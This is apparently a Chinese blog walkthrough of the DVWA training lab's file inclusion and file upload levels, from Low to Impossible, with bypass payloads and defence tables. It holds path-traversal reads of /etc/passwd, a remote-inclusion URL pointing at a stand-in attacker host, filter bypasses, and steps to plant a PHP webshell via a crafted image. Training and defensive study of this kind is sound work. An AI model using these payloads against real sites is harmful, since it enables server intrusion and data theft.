DVWA 靶场深度解析:文件包含 & 文件上传(Low → Impossible)

  • [一、文件包含漏洞(File Inclusion)](#一、文件包含漏洞(File Inclusion))

    • [1.1 核心原理](#1.1 核心原理)
    • [1.2 Low 级别:毫无防护](#1.2 Low 级别:毫无防护)
    • [1.3 Medium 级别:简单过滤](#1.3 Medium 级别:简单过滤)
    • [1.4 High 级别:通配符匹配](#1.4 High 级别:通配符匹配)
    • [1.5 Impossible 级别:白名单硬编码](#1.5 Impossible 级别:白名单硬编码)
    • [1.6 企业真实防御方案](#1.6 企业真实防御方案)
  • [二、文件上传漏洞(File Upload)](#二、文件上传漏洞(File Upload))

    • [2.1 核心原理](#2.1 核心原理)
    • [2.2 Low 级别:直接上传](#2.2 Low 级别:直接上传)
    • [2.3 Medium 级别:MIME 校验](#2.3 Medium 级别:MIME 校验)
    • [2.4 High 级别:后缀名 + 文件头](#2.4 High 级别:后缀名 + 文件头)
    • [2.5 Impossible 级别:全方位防御](#2.5 Impossible 级别:全方位防御)
    • [2.6 解析漏洞配合](#2.6 解析漏洞配合)

一、文件包含漏洞(File Inclusion)

1.1 核心原理

PHP 中常用 include()​、require()​ 来动态加载文件。如果用户能控制参数:

复制代码
<?php
include($_GET['page']);
?>

就可能导致:

  • LFI(本地文件包含):读取服务器任意文件
  • RFI(远程文件包含):执行远程恶意文件
  • 日志投毒 → RCE:向日志写 PHP 代码,再包含日志执行

1.2 Low 级别:毫无防护

源码:

复制代码
<?php
$file = $_GET['page'];
include($file);
?>

通关:

复制代码
# Linux
?page=../../../../etc/passwd

# 远程文件包含(需 allow_url_include=On)
?page=http://攻击者IP/shell.txt

1.3 Medium 级别:简单过滤

源码:

复制代码
$file = str_replace(array("http://", "https://", "../", "..\\"), "", $file);

绕过 --- 双写绕过:

复制代码
?page=..././..././hackable/flags/fi.php
# 过滤后变成 ../,成功绕过!

1.4 High 级别:通配符匹配

源码:

复制代码
if (!fnmatch("file*", $file)) { exit; }

绕过 --- file:// 伪协议:

复制代码
?page=file:///D:/phpstudy_pro/WWW/DVWA/hackable/flags/fi.php

1.5 Impossible 级别:白名单硬编码

源码:

复制代码
$whitelist = ["include.php", "file1.php", "file2.php", "file3.php"];
if (!in_array($file, $whitelist)) { exit; }

✅ 无法绕过 --- 核心教训:白名单 > 黑名单


1.6 企业真实防御方案

防御措施 具体做法
白名单 硬编码允许包含的文件列表
不拼接路径 使用映射表 $map'home' = 'home.php'​
open_basedir 限制 PHP 只能访问指定目录
禁止远程包含 ​allow_url_include = Off​

二、文件上传漏洞(File Upload)

2.2 Low 级别:直接上传

无任何校验,直接上传 shell.php​,蚁剑连接。


2.3 Medium 级别:MIME 校验

源码:校验 $_FILES'uploaded''type'

绕过:Burp 抓包改 Content-Type: application/octet-stream​ → image/jpeg​

💡 Content-Type​ 来自客户端 HTTP 头,可任意伪造!


2.4 High 级别:后缀名 + 文件头

源码:校验后缀名 + getimagesize()​

绕过 --- 图片马 + 文件包含:

Step 1:制作图片马

复制代码
copy /b normal.jpg + shell.php shell.jpg

Step 2:上传 shell.jpg​

Step 3:配合文件包含 Low 级别解析

复制代码
?page=../../hackable/uploads/xxx.jpg

2.5 Impossible 级别:全方位防御

防御点 具体做法 目的
Anti-CSRF ​checkToken()​ 防自动化攻击
MIME 校验 只允许 image/jpeg​、image/png​ 类型过滤
后缀名校验 白名单 jpg/jpeg/png​ 防改后缀
文件头校验 ​getimagesize()​ 确认真实图片
随机重命名 ​md5(uniqid()...)​ 防猜测路径
二次渲染 ​imagecreatefromjpeg()​ 重新编码 破坏嵌入的恶意代码

相关推荐
数智工坊2 小时前
机器人运动控制:采样、优化与学习三大流派深度对比与实战
android·学习·机器人
故渊at4 小时前
第二板块:Android 四大组件标准化学理 | 第八篇:Service 后台执行实体与优先级
android·gitee·service·前台服务·后台服务
会Tk矩阵群控的小木4 小时前
安卓群控系统对于游戏工作室实战教程
android·运维·游戏·adb·开源软件·个人开发
qeen875 小时前
【C++】类与对象之类的默认成员函数(二)
android·c语言·开发语言·c++·笔记·学习
故渊at5 小时前
第二板块:Android 四大组件标准化学理 | 第九篇:BroadcastReceiver 事件分发与有序广播
android·gitee·broadcast·广播·动态注册·静态注册
JohnnyDeng945 小时前
【Android】Room 数据库高级用法与性能调优:从查询瓶颈到毫秒级响应
android·性能优化·kotlin·room
zeqinjie5 小时前
Flutter 折叠屏 iPad / 宽屏适配实践
android·前端·flutter
ab_dg_dp5 小时前
Android 17+ 提取 AIDL 生成 Java 文件的实用脚本
android·java·python
Arrom6 小时前
DLNA 渲染端排障实战:从 20s 卡顿到 stale subscriber 的两周追凶之旅
android·java